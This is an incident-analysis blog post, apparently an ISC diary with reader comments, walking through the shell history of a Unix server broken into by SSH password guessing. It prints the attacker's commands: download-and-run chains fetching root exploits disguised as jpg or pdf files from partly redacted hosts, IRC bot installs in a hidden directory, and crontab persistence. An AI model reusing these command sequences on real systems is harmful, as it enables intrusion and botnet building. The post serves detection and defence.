Anatomy of a Unix breach
ISC reader Will wrote in to share a bash_history file (thanks!) from one of his Unix servers that got hacked. Since knowing the command sequence used by the bad guys helps to detect similar intrusions, we are sharing it here in (almost) full length. Some of the sites hosting the used root shell exploits are still live, and hence not included. The whole breach of Will's server started via a password guessing attack against SSH. We have covered this risk repeatedly in ISC diaries. Once the bad guys were in, they ran the commands below, and then apparently used the just installed IRC bots to continue scanning for SSH ports on other systems.
Phase#1: The bad guy tries to find out more about the box he just broke into
uptime
uname -a
w
ifconfig
Phase#2: Bad guy downloads all the Linux root exploits that he has, and just run them, hoping for a lucky break. Note how some of the TAR files come with an innocent-looking jpg or pdf extension. Hence, if you are filtering certain file types at the perimeter proxy, you better hope that your proxy goes by MIME type and magic bytes, and not by extension alone!
wget http://i......go.ro/exploit.jpg;tar xzvf exploit.jpg;rm -rf exploit.jpg;cd exploit;./mv;id
wget http://m......co.uk/sandu/ex.tgz ; tar zxvf ex.tgz ; cd e ; chmod +x * ; ./exploit ; id
wget http://g......at.ua/2.6.18.tgz;tar zxvf 2.6.18.tgz;rm -rf 2.6.18.tgz;cd uid0;./uid
wget http://g......at.ua/expl.pdf;tar zxvf expl.pdf;rm -rf expl.pdf;cd w;./wunderbar_emporium.sh
wget http://c......org/god.jpg;tar zxvf god.jpg;rm -rf god.jpg;cd .ICE-UNIX;./autorun;./run
We are not quite sure whether any of the above exploits was successful. The "id" command, or the exploit itself, would have told the attacker whether he got lucky, but there aren't any traces in the shell history file that would tell us either way.
In any case .. follows Phase #3a: The attacker installs some goodies. "virus.tar" isn't really a virus, it is a copy of EnergyMech, an IRC bot. Note how the bad guy uses Nano to edit the config file, which tells us that he isn't all that experienced on Unix. A real Unix hacker would most likely use "vi", because vi is present on all Unix flavors and versions. Note also how he calls the IRC bot "Evolution" when he starts it, likely hoping that an admin would overlook it in a casual investigation.
/sbin/ifconfig -a | grep inet
wget http://f......com/storm12/virus.tar
tar xvf virus.tar
rm -rf virus.tar
cd virus
ls -a
nano start
nano inst
chmod +x *
./autorun
./start Evolution
Phase#3b: Install some more goodies. egg.tgz is a copy of Eggdrop, another IRC bot. Note how the bad guy puts the files into a directory called " " (single space). If you want to search for such directories on your system, try this
#find / -name " " -exec ls -aldQ {} ;
mkdir " "
cd " "
ls -a
wget http://c.......org/egg.tgz
cd " "
tar zxvf egg.tgz
rm -rf egg.tgz
cd .access.log
ls -a
chmod +x *
./eggdrop -m bot1.conf
ls -a
cd scripts
nano respond.tcl
pwd
Phase #4: The attacker wants to make sure that access can be re-gained, and configures the cron tab to re-start some of his processes automatically on a schedule.
crontab -l
crontab -e
exit
Comments
MIME type is only a HTTP protocol attribute suggesting how a web browser should interpret the file, it is completely under control of the remote server, and doesn't matter once the file is downloaded.
The payload could have a file extension, and a mime type of Image/Jpeg, and it probably will based on how server determines mime type. The user can still use the file as an archive once downloaded.
Mysid
Jul 31st 2011
1 decade ago
Daniel@ISC
Jul 31st 2011
1 decade ago
Have they been reported to malwaredomains.com so that we can block them at the proxy?
John Hardin
Aug 1st 2011
1 decade ago
Jordan S.
Aug 1st 2011
1 decade ago
Another favorite hidden directory scheme is to create a directory named "...' It's easy to miss it below "." and ".." if you don't know to look for it.
David
Aug 1st 2011
1 decade ago
http://www.duosecurity.com
And doesn't even require restarting sshd. User-level access pretty much translates to root these days (kernel bugs a plenty) - but even just protecting admin accounts is a good start...
dugsong
Aug 1st 2011
1 decade ago
Chris
Aug 5th 2011
1 decade ago
donald
Aug 5th 2011
1 decade ago